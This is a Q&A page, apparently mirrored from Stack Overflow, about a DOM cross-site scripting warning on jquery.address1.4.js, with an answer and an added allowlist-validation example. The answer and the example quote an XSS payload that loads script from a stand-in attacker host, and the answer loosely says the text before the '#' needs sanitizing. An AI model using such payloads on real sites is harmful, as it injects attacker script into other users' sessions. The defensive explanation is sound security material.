
Security Scan shows vulnerability in JS Script file

I recently ran a Security Scan on my site, and one of the JS files being used was flagged as having a DOM Cross Site Scripting issue, and I'm not sure how I can fix it.

File: jquery.address1.4.js

Here is the script from the portion of the code that was flagged:

    _supported =
        (_mozilla && _version >= 1) ||
        (_msie && _version >= 6) ||
        (_opera && _version >= 9.5) ||
        (_webkit && _version >= 523);

    if (_supported) {
        if (_opera) {
            history.navigationMode = 'compatible';
        }
        if (document.readyState == 'complete') {
            var interval = setInterval(function() {
                if ($.address) {
                    _load();
                    clearInterval(interval);
                }
            }, 50);
        } else {
            _options();
            $(_load);
        }
        $(window).bind('popstate', _popstate).bind('unload', _unload);
    } else if (!_supported && _hrefHash() !== '') {
        _l.replace(_l.href.substr(0, _l.href.indexOf('#')));
    } else {
        _track();
    }

The line of code in question is this:

    _l.replace(_l.href.substr(0, _l.href.indexOf('#')));

The scan is telling me to sanitize the inputs, but I'm not sure what it's referring to since we have no "inputs" on the site. How can I fix the above code so it can pass a security scan?

EDIT: This is the value of _l:

    _l = _t.location,

From:

    _window = function() {
        try {
            return top.document !== UNDEFINED ? top : window;
        } catch (e) {
            return window;
        }
    },

    ID = 'jQueryAddress',
    STRING = 'string',
    HASH_CHANGE = 'hashchange',
    INIT = 'init',
    CHANGE = 'change',
    INTERNAL_CHANGE = 'internalChange',
    EXTERNAL_CHANGE = 'externalChange',
    TRUE = true,
    FALSE = false,
    _opts = {
        autoUpdate: TRUE,
        crawlable: FALSE,
        history: TRUE,
        strict: TRUE,
        wrap: FALSE
    },
    _browser = $.browser,
    _version = parseFloat($.browser.version),
    _mozilla = _browser.mozilla,
    _msie = _browser.msie,
    _opera = _browser.opera,
    _webkit = _browser.webkit || _browser.safari,
    _supported = FALSE,
    _t = _window(),
    _d = _t.document,
    _h = _t.history,
    _l = _t.location,
    _si = setInterval,
    _st = setTimeout,
    _re = /\/{2,9}/g,
    _agent = navigator.userAgent,
    _frame,
    _form,
    _url = _search(document),
    _qi = _url ? _url.indexOf('?') : -1,
    _title = _d.title,
    _silent = FALSE,
    _loaded = FALSE,
    _justset = TRUE,
    _juststart = TRUE,
    _updating = FALSE,
    _listeners = {},
    _value = _href();

The unsanitized value in this example will be the hash value retrieved from your URL. Any value that precedes the "#" in your URL should be sanitized, to ensure that an attacker is not able to supply their own JavaScript in that context.

Just because this value may not be an explicit user-supplied "input", there is nothing to prevent a malicious user from supplying a malicious value such as the following:

    #"><script src=http://badguy.com/xss.js />

which would execute in the context of other users.

A valid defense for this example, or input sanitization, would be a whitelist approach. Only accept known values for #, do not allow anything that an attacker might supply.

This is a great resource on defending against DOM based XSS: https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet. I suggest you read through it.
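The whitelist approach the answer recommends, as an added example that is not part of the original post and not code from jquery.address: the fragment after "#" is taken from the URL, decoded, checked against a strict syntactic pattern and then against a constructed set of routes the site actually knows (`KNOWN_ROUTES`, `ROUTE_PATTERN`, `safeRoute`, `renderSafe` and the sample URLs are all assumptions made for this example). For comparison, `stripHash` performs the same computation as the flagged line (the URL up to the first "#"), and `renderUnsafe` shows the kind of sink a DOM XSS scanner is warning about, where the raw fragment reaches markup unchanged.

```javascript
// Added example (not from jquery.address or the original post).
// Demonstrates the allowlist approach from the answer: the fragment taken
// from the URL is only acted on if it is one of a known set of values.

// Constructed allowlist of fragments this hypothetical site routes on.
const KNOWN_ROUTES = new Set(['home', 'about', 'contact', 'products/list']);

// Strict syntactic gate: letters, digits, slash, dash, underscore, 1-64 chars.
// Quotes, angle brackets, spaces and so on never pass this check.
const ROUTE_PATTERN = /^[A-Za-z0-9_\/-]{1,64}$/;

// Raw fragment: everything after the first '#', or '' when there is none
// (the same "is there a hash" distinction as the _hrefHash() !== '' test).
function rawHash(href) {
  const i = href.indexOf('#');
  return i === -1 ? '' : href.substring(i + 1);
}

// Same computation as the flagged line: the URL up to, not including, '#'.
function stripHash(href) {
  const i = href.indexOf('#');
  return i === -1 ? href : href.substr(0, i);
}

// Allowlist validation: returns the route when it is known, otherwise null.
// decodeURIComponent throws on malformed %-sequences; treat that as invalid.
function safeRoute(href, known = KNOWN_ROUTES) {
  let fragment;
  try {
    fragment = decodeURIComponent(rawHash(href));
  } catch (e) {
    return null;
  }
  if (!ROUTE_PATTERN.test(fragment)) return null;
  return known.has(fragment) ? fragment : null;
}

// Before: the fragment flows into markup unchanged. This is the DOM XSS
// sink a scanner reports; the fragment is attacker-controlled.
function renderUnsafe(href) {
  const h = rawHash(href);
  return '<a href="#' + h + '">' + h + '</a>';
}

// After: only an allowlisted route ever reaches the markup; anything else
// falls back to a fixed default instead of being echoed.
function renderSafe(href) {
  const route = safeRoute(href);
  if (route === null) {
    return '<a href="#home">home</a>';
  }
  return '<a href="#' + route + '">' + route + '</a>';
}

// Constructed sample URLs, including the payload shape quoted in the answer
// and its percent-encoded form.
const SAMPLES = [
  'http://example.test/page#about',
  'http://example.test/page#products/list',
  'http://example.test/page#"><script src=http://badguy.com/xss.js />',
  'http://example.test/page#%22%3E%3Cscript%3E',
  'http://example.test/page',
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const u of SAMPLES) {
    console.log(JSON.stringify(u), '->', JSON.stringify(safeRoute(u)));
  }
}
```

The two gates are deliberately redundant: the pattern rejects anything with quote or angle-bracket characters regardless of the allowlist, and the allowlist means a syntactically clean but unknown value is still dropped rather than used. Decoding happens before validation so that a percent-encoded payload cannot slip past the pattern and be decoded later by the browser.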

Disclaimer: the technical posts on this site are licensed under CC BY-SA 4.0; if you need to repost them, please credit this site's URL or the original address. For any questions contact: yoyou2525@163.com.

粤ICP备18138465号  © 2020-2024 STACKOOM.COM